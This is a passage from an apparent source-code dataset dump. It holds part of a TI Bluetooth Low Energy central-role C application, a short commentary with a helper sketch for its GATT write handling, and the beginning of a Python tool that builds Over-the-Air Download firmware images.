(((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && temperatureHandles)\n {\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Throughput & Temperature Services Found!\");\n\n discState = BLE_DISC_STATE_IDLE;\n\n SimpleBLECentral_enqueueMsg(SBC_ENABLE_TEMPERATURE_NOTI_EVT, SUCCESS, NULL);\n }\n }\n break;\n\n default:\n {\n // Do something meaningful 
here if we have an issue\n discState = BLE_DISC_STATE_IDLE;\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Error in discovering profiles and services!\");\n }\n break;\n }\n}\n\n/*\n * Local Function to quickly check the device list\n * For a particualr Address\n */\nbool checkDevList(uint8_t* addr, uint8_t* index)\n{\n int i = 0;\n\n for(i = 0; i < scanRes; i++)\n {\n if(memcmp(devList[i].addr, addr, B_ADDR_LEN) == 0)\n {\n *index = i;\n return true;\n }\n }\n\n return false;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_addDeviceInfo\n *\n * @brief Add a device to the device discovery result list\n * Info added is: BDAddr and Scan Response Data\n * It's assumed all data passed in will get freed\n *\n * @return none\n */\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType,\n uint8_t dataType, uint8_t dataLen,\n uint8_t* data)\n{\n uint8_t index;\n\n // If result count not at max\n if (scanRes < DEFAULT_MAX_SCAN_RES)\n {\n switch(dataType)\n {\n case GAP_ADRPT_ADV_IND:\n case GAP_ADRPT_ADV_SCAN_IND:\n\n if (SimpleBLECentral_findSvcUuid(THROUGHPUT_SERVICE_SERV_UUID,\n data, dataLen) &&\n SimpleBLECentral_findSvcUuid(TEMPERATURE_SERVICE_SERV_UUID,\n data, dataLen))\n {\n if (checkDevList(pAddr, &index) == false)\n {\n devList[scanRes].addrType = addrType;\n memcpy(devList[scanRes].addr, pAddr, B_ADDR_LEN);\n\n scanRes++;\n }\n }\n break;\n\n case GAP_ADRPT_SCAN_RSP:\n case GAP_ADRPT_ADV_DIRECT_IND:\n case GAP_ADRPT_ADV_NONCONN_IND:\n default:\n /* Ignore all others */\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_eventCB\n *\n * @brief Central event callback function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return TRUE if safe to deallocate event message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent)\n{\n // Forward the role event to the application\n if (SimpleBLECentral_enqueueMsg(SBC_STATE_CHANGE_EVT,\n SUCCESS, (uint8_t *)pEvent))\n {\n // App will process and free the event\n return FALSE;\n }\n\n // Caller should free the event\n return TRUE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscHandler\n *\n * @brief Clock handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_startDiscHandler(UArg a0)\n{\n Event_post(syncEvent, SBC_START_DISCOVERY_EVT);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_keyChangeHandler\n *\n * @brief Key event handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys)\n{\n SimpleBLECentral_enqueueMsg(SBC_KEY_CHANGE_EVT, keys, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_readRssiHandler\n *\n * @brief Read RSSI handler function\n *\n * @param a0 - read RSSI index\n *\n * @return none\n */\nvoid SimpleBLECentral_readRssiHandler(UArg a0)\n{\n SimpleBLECentral_enqueueMsg(SBC_RSSI_READ_EVT, SUCCESS,\n (uint8_t *)&readRssi[a0]);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n * @param pData 
- message data pointer.\n *\n * @return  TRUE or FALSE\n */\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t state,\n                                           void *pData)\n{\n  sbcEvt_t *pMsg = ICall_malloc(sizeof(sbcEvt_t));\n\n  // Create dynamic pointer to message.\n  if (pMsg)\n  {\n    pMsg->hdr.event = event;\n    pMsg->hdr.state = state;\n    pMsg->pData = pData;\n\n    // Enqueue the message.\n    return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n  }\n\n  return FALSE;\n}\n\n/*********************************************************************\n * @fn      SimpleBLECentral_PHYHandler\n *\n * @brief   RTOS clock handler for Coded PHY changes\n *\n * @param   a0 - RTOS clock arg0.\n *\n * @return  void\n */\nvoid SimpleBLECentral_PHYHandler(UArg a0)\n{\n  // Check if we've changed to 1M before changing to the requested PHY\n  if(phyIndex == 0 && phyConfirm)\n  {\n    // Because we are in a SWI, the UART Driver should not be used\n    // Inform the Application task to send request\n    SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phyClock_phyIndex);\n  }\n  else\n  {\n    // We're still trying to get to a coded PHY\n    // Restart the timer\n    Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n  }\n}\n\n/*********************************************************************\n * @fn      SimpleBLECentral_doSetPhy\n *\n * @brief   Set PHY preference.\n *\n * @param   index - 0, 1, 2, 3\n *\n * @return  always true\n */\nbool SimpleBLECentral_doSetPhy(uint8 index)\n{\n  static uint8_t phy[] = {\n    HCI_PHY_1_MBPS, HCI_PHY_2_MBPS, HCI_PHY_CODED, HCI_PHY_CODED\n  };\n\n  // Switch to determine PHY options (needed for coded S2 and S8 mode)\n  switch(index)\n  {\n    case 0:\n    case 1:\n      phyOptions = HCI_PHY_OPT_NONE;\n      break;\n    case 2:\n      phyOptions = HCI_PHY_OPT_S2;\n      break;\n    case 3:\n      phyOptions = HCI_PHY_OPT_S8;\n      break;\n  }\n\n  // Generate index to send over to peripheral\n  uint8_t* data = ICall_malloc(sizeof(uint8_t));\n  switch(phy[index])\n  {\n    case HCI_PHY_1_MBPS:\n      *data = 0;\n      break;\n\n    case HCI_PHY_2_MBPS:\n      *data = 1;\n      break;\n\n    case HCI_PHY_CODED:\n    {\n      if(phyOptions == HCI_PHY_OPT_S2)\n        *data = 2;\n      else if (phyOptions == HCI_PHY_OPT_S8)\n        *data = 3;\n    }\n    break;\n  }\n\n  if( throughputHandles )\n  {\n    // Check if we're already using a coded PHY - switch over to 1M\n    // in between in order to keep stability\n    if(phyIndex != *data && *data >= 2 && phyIndex >= 2)\n    {\n      uint8_t* phy1M = ICall_malloc(sizeof(uint8_t));\n      *phy1M = 0;\n      SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phy1M);\n\n      // Start a Timer to trigger a Coded PHY change\n      Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n\n      // Assign the requested PHY to the payload of the PHY handler\n      phyClock_phyIndex = data;\n    }\n    else\n    {\n      // Inform the Application to perform a GATT write with\n      // the selected index - this will tell the peripheral to change PHY\n      SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, data);\n    }\n  }\n  else\n  {\n    // Set this device's PHY Preference on the current connection.\n    HCI_LE_SetPhyCmd(connHandle, LL_PHY_USE_PHY_PARAM, phy[index], phy[index], phyOptions);\n\n    // Set this device's PHY Preference on future connections by using:\n    HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_PHY_PARAM, phy[index], phy[index]);\n\n    ICall_free(data);\n  }\n\n  // Go to Main Menu\n  tbm_goTo(&sbcMenuMain);\n\n  return true;\n}\n\n/*********************************************************************\n * @fn      SimpleBLECentral_doScanAndConnect\n *\n * @brief   Scan for devices, select one from the scan list, and connect.\n *\n * @param   index - 0, 1, 2(, 3, 4)\n *\n * @return  always true\n */\nbool 
SimpleBLECentral_doScanAndConnect(uint8 index)\n{\n switch (index)\n {\n case 0:\n // SELECT NEXT DEVICE ON SCAN LIST\n SBC_NextDevice();\n\n break;\n\n case 1:\n // CONNECT TO SELECTED DEVICE\n SBC_ConnectToDevice();\n\n break;\n\n case 2:\n // SCAN FOR DEVICES\n\n // Disable Scanning until completed\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_NONE, TBM_ITEM_ALL);\n\n // Indicate to the user that Scanning Has Started\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Scanning...\");\n\n // Clear the Device List\n SBC_ClearDeviceList();\n\n // Command to tell GAPRole to start scanning\n GAPCentralRole_StartDiscovery(DEFAULT_DISCOVERY_MODE,\n DEFAULT_DISCOVERY_ACTIVE_SCAN,\n DEFAULT_DISCOVERY_WHITE_LIST);\n break;\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doToggleRSSI\n *\n * @brief Toggle RSSI Readings\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doToggleRSSI(uint8 index)\n{\n // Ignored\n (void)index;\n\n if (SimpleBLECentral_RssiFind(connHandle) == NULL)\n {\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Starting\");\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n SimpleBLECentral_CancelRssi(connHandle);\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Cancelled\");\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doDisconnect\n *\n * @brief Disconnect from current Connection\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doDisconnect(uint8 index)\n{\n // Ignored\n (void)index;\n\n GAPCentralRole_TerminateLink(connHandle);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SBC_ClearDeviceList\n *\n * @brief Clear the Device List and Display.\n *\n * @return void\n */\nvoid SBC_ClearDeviceList()\n{\n // Clear the Device Display\n Display_clearLine(dispHandle, SBC_ROW_STATUS_2);\n Display_clearLine(dispHandle, SBC_ROW_STATUS_3);\n\n // Reset Scan Res indicating No Valid Scan data on Device List\n scanRes = 0;\n scanIdx = -1;\n}\n\n/*********************************************************************\n * @fn SBC_NextDevice\n *\n * @brief Select the next device on the Device List and Display.\n *\n * @return void\n */\nvoid SBC_NextDevice(){\n // Increment scanIndex to the next valid entry\n ((scanIdx + 1) == scanRes) ? scanIdx = 0 : scanIdx++;\n\n // Print the Device pointed to by the Index\n Display_print1(dispHandle, SBC_ROW_STATUS_2, 0, \"Scanned Device %d\", (scanIdx+1));\n Display_print0(dispHandle, SBC_ROW_STATUS_3, 0, Util_convertBdAddr2Str(devList[scanIdx].addr));\n}\n\n/*********************************************************************\n * @fn SBC_ConnectToDevice\n *\n * @brief Connect to the selected Device\n *\n * @return void\n */\nvoid SBC_ConnectToDevice()\n{\n // connect to current device selected by scanIdx\n uint8_t *peerAddr = devList[scanIdx].addr;\n uint8_t addrType = devList[scanIdx].addrType;\n\n // GAP Role to Connecting\n state = BLE_STATE_CONNECTING;\n\n /* Change default sup. timeout */\n GAP_SetParamValue( TGAP_CONN_EST_SUPERV_TIMEOUT, 500 );\n\n GAPCentralRole_EstablishLink(DEFAULT_LINK_HIGH_DUTY_CYCLE,\n DEFAULT_LINK_WHITE_LIST,\n addrType, peerAddr);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_performPeriodicTask\n *\n * @brief Perform a periodic application task. 
This function gets called\n * each time the periodic LED clock (SBC_PERIODIC_LED_PERIOD) expires.\n * While connected, it toggles the green LED and holds the red LED off;\n * while disconnected, it holds the green LED off and the red LED on.\n *\n * @param   None.\n *\n * @return  None.\n */\nstatic void SimpleBLECentral_performLEDTask(void)\n{\n  static uint32_t ledPin;\n\n  if (state == BLE_STATE_CONNECTED) {\n    ledPin = (ledPin) ? 0 : 1;\n    PIN_setOutputValue(appPins, Board_RLED, 0);\n  }\n  else {\n    ledPin = 0;\n    PIN_setOutputValue(appPins, Board_RLED, 1);\n  }\n\n  PIN_setOutputValue(appPins, Board_GLED, ledPin);\n}\n\n/*********************************************************************\n * @fn      SimpleBLECentral_clockHandler\n *\n * @brief   Handler function for clock timeouts.\n *\n * @param   arg - event type\n *\n * @return  None.\n */\nstatic void SimpleBLECentral_clockHandler(UArg arg)\n{\n  // Wake up the application.\n  Event_post(syncEvent, arg);\n}\n\n/*********************************************************************\n*********************************************************************/\n"
},
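The central source above repeats one buffer-management pattern for every GATT write it issues (enabling temperature notifications, requesting a PDU update, requesting a PHY update): allocate the payload with GATT_bm_alloc, copy the data in, submit with GATT_WriteCharValue, and call GATT_bm_free only when submission fails, since on SUCCESS the stack takes ownership of the buffer. Below is a minimal sketch of that pattern factored into a single helper; the helper name SBC_writeCharValue and its parameter list are illustrative assumptions rather than part of the original file, and the NULL check after allocation is an addition the original cases omit.

// Hedged sketch of the recurring GATT write flow; assumes the same
// TI BLE-Stack calls (GATT_bm_alloc, GATT_WriteCharValue, GATT_bm_free)
// used elsewhere in this file. Helper name and signature are hypothetical.
static bStatus_t SBC_writeCharValue(uint16_t connHandle, uint16_t charHdl,
                                    uint8_t *pData, uint16_t len,
                                    ICall_EntityID appEntity)
{
  attWriteReq_t writeReq = {0};

  writeReq.cmd    = 0;       // ATT Write Request (a response is expected)
  writeReq.sig    = 0;       // No authentication signature
  writeReq.handle = charHdl;
  writeReq.len    = len;
  writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, len, NULL);

  if (writeReq.pValue == NULL)
  {
    return bleNoResources;   // Allocation failed; nothing to free
  }

  memcpy(writeReq.pValue, pData, len);

  bStatus_t status = GATT_WriteCharValue(connHandle, &writeReq, appEntity);

  if (status != SUCCESS)
  {
    // On failure the app still owns the buffer and must free it,
    // mirroring the error paths in SimpleBLECentral_processAppMsg;
    // on SUCCESS the stack frees it after transmission.
    GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);
  }

  return status;
}

With such a helper, a case like SBC_PDU_UPDATE_EVT could reduce to one call plus its requeue-on-failure logic, e.g. SBC_writeCharValue(connHandle, throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU].charHdl, &pduSize, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, selfEntity).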
{
"alpha_fraction": 0.576655387878418,
"alphanum_fraction": 0.5953716039657593,
"avg_line_length": 48.5,
"blob_id": "359bfd76bef4c560270ec4c42584b4eaaca11dd6",
"content_id": "7c8f49614f03d59aaf864d57ad70bbdcdb55c33e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29600,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 598,
"path": "/tools/scripts/oad/oad_image_tool.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# Filename: oad_image_tool.py\n#\n# Description: This tool is used to generate OAD/production images for OAD\n# Enabled projects using the TI-BLE SDK.\n#\n#\n# Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n#\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the\n# distribution.\n#\n# Neither the name of Texas Instruments Incorporated nor the names of\n# its contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\n# Needs python 2.7.10\nfrom __future__ import print_function\nimport __builtin__\nimport argparse\nimport os\nimport sys\nimport struct\nimport textwrap\nimport math\nfrom collections import namedtuple\n\ntry:\n import crcmod # pip [--proxy <addr>] install crcmod\nexcept ImportError:\n print(\"Could not load module 'crcmod'. Please install package. pip [--proxy <addr>] install crcmod\")\n sys.exit(1)\n\ntry:\n from intelhex import IntelHex # pip [--proxy <addr>] install intelhex\nexcept ImportError:\n print(\"Could not load module IntelHex. Please install package. 
pip [--proxy <addr>] install intelhex.\")\n sys.exit(1)\n\n#tool version number\ntool_version = \"1.0\"\n# CRC related data\n# CRC Polynomial used by OAD for CC254x\n# crc16 = crcmod.mkCrcFun(0x18005, rev=False, initCrc=0x0000, xorOut=0x0000)\n# CRC Poly used by OAD for CC26xx\ncrc16 = crcmod.mkCrcFun(0x11021, rev=False, initCrc=0x0000, xorOut=0x0000)\n\n\nOAD_HDR_FMT = 'HHHH4sHBB'\nOadHdr = namedtuple('OadImgHdr', 'crc crcShdw imgVer imgLen usrId imgAddr imgType status')\n#the below dictionary contains the mapping from imgType string to an integeer\nimgTypes = {'app': 1, 'stack': 2, 'np': 3, 'production': 4 }\n\n#Meta data status field measures success as 0xFF\nMETA_STATUS_SUCCESS = 0xFF\nMETA_STATUS_PREPENDED = 0XFE\n#External flash layout (this info is in ext_flash_layout.h)\nEXT_FL_SECTOR_1_SECTOR = \"APP: 0x00000 - 0x1FFFF\"\nEXT_FL_SECTOR_2_SECTOR = \"STACK/NP: 0x20000 - 0x3FFFF\"\nEXT_FL_SECTOR_3_SECTOR = \"Factory: 0x40000 - 0x5FFFF\"\nEXT_FL_PG_SIZE = 4096\n\n#OAD defines (this info is in oad_target.h)\nOAD_BLOCK_SIZE = 16 #this value is in bytes\nOAD_METADATA_SIZE = 16 #this value is in bytes\nINT_FL_PG_SIZE = 4096 #this value is in bytes\nINT_FL_RSVD_PG1 = 0x1000\nINT_FL_RSVD_PG7 = 0x7000\nINT_FL_RSVD_PG31 = 0x1F000\n#note that only internal flash pages between 6 and 30 (inclusive) can be updated OTA for int flash OAD\nINT_FL_OAD_IMG_B_META_BEGIN = 0x9000 #First addr of on chip OAD img B\nINT_FL_OAD_IMG_B_END = 0x12FFF\nINT_FL_OAD_IMG_A_META_BEGIN = 0x600\nINT_FL_OAD_IMG_A_BEGIN = 0x100\nINT_FL_OAD_IMG_A_END = 0x8FFF\n#note that only internal flash pages between 1-30 (inclusive) can be updated OTA for ext flash OAD\nEXT_FL_OAD_META_BEGIN = 0x1000 #First addr of app space for ext flash OAD\nEXT_FL_OAD_META_END = EXT_FL_OAD_META_BEGIN + OAD_METADATA_SIZE\n\nclass TermColors:\n FAIL = '\\033[41m'\n RESET = '\\033[0m'\n\n def __init__(self):\n pass\n\ndef mem_usage(start_sect, stop_sect, segments, legalSegs=[], reqSegs=[], ih=None):\n def addr(sect, ln, col):\n return sect * 4096 + ((3 - ln) + 4 * col) * 256\n\n def calc_overlap(r1, r2):\n overlaps = max(r1[0], r2[0]) <= min(r1[1]-1, r2[1]-1)\n if overlaps:\n return min(r1[1]-1, r2[1]-1)-max(r1[0], r2[0])\n return 0\n\n ret = '|'.join([' %02d ' % i for i in xrange(start_sect, stop_sect)]) + '\\n'\n\n for line in xrange(4):\n for sect in xrange(start_sect, stop_sect):\n for col in xrange(4):\n a = addr(sect, line, col)\n overlap = max([calc_overlap([a, a + 256], seg) for seg in segments])\n if overlap == 0: sym = '-'\n elif overlap < 128: sym = '.'\n elif overlap < 255: sym = 'x'\n else:\n sym = 'X'\n if ih is not None:\n content = ih.tobinstr(a, a+255)\n if content == '\\xff'*len(content): sym = 'F'\n elif content == '\\x00'*len(content): sym = '0'\n\n if overlap:\n ret += sym if max([calc_overlap([a, a + 256], seg) for seg in legalSegs]) else TermColors.FAIL + sym + TermColors.RESET\n else:\n ret += sym if not max([calc_overlap([a, a + 256], seg) for seg in reqSegs]) else TermColors.FAIL + sym + TermColors.RESET\n ret += ' '\n ret += '\\n'\n return ret\n\n\n#Argparse is a class that helps to make friendlier command line interfaces.\n#the text you see below is what is printed as a form of documentation on how\n#to use the tool, similar to a man command\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=textwrap.dedent('''\\\n Merges Intel Hex format files provided as command line arguments or via stdin.\n Default output is Intel-Hex to stdout. 
Input via stdin and/or output via stdout\n implies --quiet\n\n Generates and inserts or appends metadata needed for Over the Air Download.\n\n Unless the location for the metadata structure is explicitly given as an\n argument with -m <addr>, one of the following will happen:\n 1. The lowest 16 bytes of the merged image is all 0xFF. In this case the meta-\n data is inserted here, and status is set to 0xFF.\n 2. The metadata is pre-pended to the hex and binary images, and status is set\n to 0xFE to indicate an OAD Host should not transmit this as part of the\n image data.\n\n The generated meta-data structure looks like this:\n\n [ 0 - 2 ][ 2 - 4 ][ 4 - 6 ][ 6 - 8 ][ 8-12 ][ 12 - 14 ][ 15 ][ 16 ]\n [ CRC ][ CRC-SHDW ][ imgVer ][ imgLen ][ usrId ][ imgAddr ][ imgType ][ stat ]\n [ calc' ][ 0xFFFF ][ (0) ][ calc'd ][ (\"EEEE\") ][ calc'd ][ (APP) ][ 0xFF ]\n\n '''),\n epilog=textwrap.dedent('''\\\n\n Usage examples:\n %(prog)s app.hex stack.hex -o - > merged_oad.hex\n Merges app.hex and stack.hex, filling in metadata from defaults.\n %(prog)s app.hex -ob app_oad.bin -m 0x1000 -r :0xE000\n Place metadata at 0x1000, and fill or cut off image at 0xE000, starting from\n first detected data location, output binary app.bin.\n '''))\n\n def auto_int(x):\n return int(x, 0)\n\n def auto_range(r):\n r = r.split(':')\n if len(r) == 1: r.append('')\n return [int(x, 0) if x != '' else None for x in r]\n\n def auto_usrId(usrId):\n usrId = usrId.strip()\n if ':' in usrId: usrId = ''.join([chr(int(x, 16)) for x in usrId.split(':')][:4])\n else: usrId = usrId[:4]\n return '\\x00' * (4-len(usrId)) + usrId\n\n def strip_path_filetype(*args, **kwargs):\n ft = argparse.FileType(*args, **kwargs)\n def inner(filename):\n if type(filename) is type(''):\n filename = filename.strip()\n if filename == '': filename = '-' # Blank means stdin/out\n return ft(filename)\n return inner\n\n #helper functions to aide in printing to the console\n def print_metadata(metaVector):\n hdr = metaVector._asdict()\n hdr['usrId'] = ':'.join(['%02X' % ord(x) for x in hdr['usrId']])\n print(textwrap.dedent(\"\"\"\n The script has calculated the 16 Byte OAD Metadata vector below\n\n Bytes: | 0 - 2 | 2 - 4 | 4 - 6 | 6 - 8 | 8-12 | 12 - 14 | 15 | 16 |\n Desc : | CRC | CRC-SHDW | imgVer | imgLen | usrId | imgAddr | imgType | stat |\n ---------------------------------------------------------------------------------------\n Data : | 0x{crc:04X} | 0x{crcShdw:04X} | {imgVer:=3d} | {imgLen:=6d} | {usrId:s} | {imgAddr:=6X} | {imgType:02X} | {status:02X} |\n ******************************************************************************************\n \"\"\".format(**hdr)))\n\n def print_console_header():\n print(textwrap.dedent(\"\"\"\n ******************************************************************************************\n Texas Instruments OAD Image Tool\n Version: {tool_version}\n ******************************************************************************************\n \"\"\".format(tool_version=tool_version)))\n\n def print_args_info(inputFileList, outHex, outBin, oadType, imgType, mergedHex):\n legalSegs = [(0, 0)]\n requiredSegs = [(0, 0)]\n if vargs.imgtype in ['app', 'stack']:\n if vargs.oadtype == 'offchip': legalSegs = [(0x1000, 0x1efff)] # 1-30 is legal\n elif vargs.oadtype == 'onchip': legalSegs = [(0x9000, 0x1efff)] # 9-30 is legal\n else:\n legalSegs = [(0, 0x20000)]\n requiredSegs = [(0, 0x3c), (0x20000-100, 0x20000)]\n\n mem_layout = mem_usage(0, 16, mergedHex.segments(), legalSegs, requiredSegs, mergedHex) +\\\n mem_usage(16, 
32, mergedHex.segments(), legalSegs, requiredSegs, mergedHex)\n\n print(textwrap.dedent(\"\"\"\n OAD Type: {oadType}\n Img Type: {imgType}\n Input file(s): {inputFiles}\n Output Hex file: {outHex}\n Output Bin file: {outBin}\n\n Layout of concatenated input files, per flash sector, before applying --range.\n \"\"\".strip('\\n').format(\n oadType = oadType,\n imgType = imgType.upper(),\n inputFiles = ', '.join([os.path.basename(f) for f in inputFileList]),\n outHex = os.path.basename(outHex.name) if outHex else \"None\",\n outBin = os.path.basename(outBin.name) if outBin else \"None\",\n )))\n print(mem_layout)\n print(textwrap.dedent(\"\"\"\n Legend: `X` 100% full, `x` >50% full, `.` <50% full, `-` empty, `F` all 0xFF,\n `0` all 0x00.\n ******************************************************************************************\n Runtime Output:\n \"\"\".strip('\\n')))\n\n def addr_is_in_oad_imgspace(addr):\n #check if the provided address lies within the OAD image space\n #for on or offchip\n if vargs.oadtype == 'offchip':\n return INT_FL_RSVD_PG1 <= addr < INT_FL_RSVD_PG31\n elif vargs.imgtype == 'production':\n #oad imgA on chip app space is between end of pg0-9\n return INT_FL_OAD_IMG_A_BEGIN <= addr <= INT_FL_OAD_IMG_A_END\n else:\n #right now on chip OAD considers App space to be between pg9-30, which includes the stack.\n #assume for now that the user doesn't try to udpate the stack\n return INT_FL_OAD_IMG_B_META_BEGIN <= addr <= INT_FL_OAD_IMG_B_END\n\n\n def argument_sanity_check(vargs, mergedHex):\n #onchip OAD only supports app or production images\n if vargs.oadtype == 'onchip' and (vargs.imgtype == 'stack' or vargs.imgtype == 'np'):\n print(\"Fatal Error: -- Cannot perform \" + vargs.oadtype +\" OAD of \" + vargs.imgtype + \". Exiting.\")\n sys.exit(1)\n\n #off chip production images are a different beast, they need don't metadata\n #they simply need to merge (optionally convert to bin) and output\n #We need to make sure there is a BIM image included (a quick check of this is to see if any of the images start at 0)\n #alternatively, non-production images cannot contain data in page zero or page 31\n\n #Network processor images are not OAD aware, but are expected to start at pg0 (include int vects)\n #this is because the serial bootloader will start loading data at addr0\n if vargs.imgtype == 'production' or vargs.imgtype == 'np':\n if mergedHex.minaddr() != 0x00000:\n print(\"Fatal Error: -- \"+ vargs.imgtype.upper() + \" image must include must have data(intVects) at addr 0. Exiting.\")\n sys.exit(1)\n else:\n print(\"Data at Addr0, assume BIM/OAD Target App is present\")\n elif vargs.imgtype == 'app' or vargs.imgtype == 'stack':\n #else we are inspecting an OAD ready that is targeted for internal flash of SoC/AP\n #check to ensure that no data is placed invalid sectors pg 0-6,31 for onchip, pg0,31 for offchip\n testStartRange = vargs.range[0] if vargs.range and vargs.range[0] else mergedHex.minaddr()\n testEndRange = vargs.range[1] if vargs.range and vargs.range[1] else mergedHex.maxaddr()\n addrSegmentsList = mergedHex[testStartRange:testEndRange].segments()\n for seg in addrSegmentsList:\n #note that the end addr seems to not be inclusive so we need to do a minus 1\n if not addr_is_in_oad_imgspace(int(seg[0])) or not addr_is_in_oad_imgspace(int(seg[1] - 1)):\n print(\"Fatal Error: -- Non Production/NP image cannot have data in reserved pages. 
Exiting.\")\n sys.exit(1)\n #otherwise input hex ranges look valid\n #do checking on meta parameter\n if vargs.meta is not None:\n if vargs.oadtype == 'onchip' and vargs.imgtype == 'production':\n #on chip OAD target still has metadata\n #by default it resides at 0x0600, however, just be sure it doesn't reside in BIM\n if not (vargs.meta >= INT_FL_RSVD_PG1 and vargs.meta < INT_FL_RSVD_PG31):\n print(\"Fatal Error: -- OAD target image must reside in pg1. Exiting.\")\n sys.exit(1)\n elif vargs.oadtype == 'offchip' and vargs.imgtype == 'production':\n print(\"Info: -- Metadata isn't needed for production images for off chip OAD, skipping meta gen\")\n elif vargs.imgtype == 'app' or vargs.imgtype == 'stack':\n if not addr_is_in_oad_imgspace(vargs.meta):\n print(\"Warning: -- metadata specified within resident image space, attempting to place at app start.\")\n elif vargs.imgType == 'np':\n print(\"Warning: -- meta data cannot be embedded in NP image, ignoring meta generation\")\n #do range checking\n if vargs.range is not None:\n if vargs.imgtype == 'production' or vargs.imgtype == 'np':\n #production/np images should start at 0 include intvecs\n if vargs.range[0] != 0x0:\n print(\"Warning: -- production/np images should contain int vects...attempting to override\")\n else:\n #other images should have range within their app space\n #might have a potential off by one here\n if (vargs.range[0] and not addr_is_in_oad_imgspace(vargs.range[0])) or (vargs.range[1] and not addr_is_in_oad_imgspace(vargs.range[1])):\n print(\"Warning: -- range should be within oad app space.\")\n\n\n\n\n #setup the command line argument options\n parser.add_argument('hexfile', help=\"Path(s) to input image(s)\", nargs='*', type=strip_path_filetype('r'))\n parser.add_argument('-t', '--oadtype', help=\"Whether to generate hex files for on- or off-chip (ExtFlash) OAD\", choices=['onchip','offchip'], default='offchip')\n parser.add_argument('-i', '--imgtype', help=\"Defines the img type. For Onchip: only app and production are valid. For Offchip: app, stack, prodcution, np are valid\",\n choices=['app', 'stack', 'np', 'production'], default='app')\n parser.add_argument('-v', '--imgVer', help=\"Defines the version of the application to be downloaded\", type=auto_int, default=0)\n parser.add_argument('-o', '--out', help='Path to output hex file.', type=strip_path_filetype('w'))\n parser.add_argument('--usrId', help='Metadata UsrId. 4 bytes. Ex EEEE or 45:45:45:45', default='EEEE', type=auto_usrId)\n parser.add_argument('-ob', '--outbin', help='Path to output bin file.', type=strip_path_filetype('wb'), nargs='?')\n parser.add_argument('-f', '--fill', help='Filler data in output [0xff]', type=auto_int, 